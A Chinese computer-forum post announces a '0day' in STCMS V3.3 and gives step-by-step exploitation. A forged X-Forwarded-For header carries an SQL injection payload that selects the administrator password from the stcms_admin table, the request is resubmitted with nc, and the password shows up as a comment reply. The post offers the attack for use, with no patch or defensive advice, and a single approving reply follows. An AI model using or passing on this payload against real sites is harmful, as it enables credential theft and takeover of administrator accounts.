电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 1395 人浏览分享

STCMS V3.3 暴管理员密码0DAY漏洞

[复制链接]
1395 1
STCMS V3.3 暴管理员密码0DAY漏洞

影响版本:STCMS V3.3   
官方地址: http://www.phpstcms.com/
漏洞产生原因:
没有过滤$_SERVER,导致用户可以伪造$_SERVER[X-FORWARDED-FOR],从而将恶意注射语句写入数据库中。

利用步骤:
1. 进入有评论的页面,先评论一个并抓包。
2. 在包中添加一条:
X-Forwarded-For: 127.0.0.1'',(select pwd from stcms_admin where id =1))#并保存
3. NC提交
4. 此时又添加了一条留言,并且多了一个回复,内容就是管理员的密码。

评论 1

Bellain Bellain  初级会员  发表于 2010-6-2 22:24:01 | 显示全部楼层
虽然看不懂
但是学习了
顶!

您需要登录后才可以回帖 登录 | 注册

本版积分规则

0

关注

0

粉丝

39

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.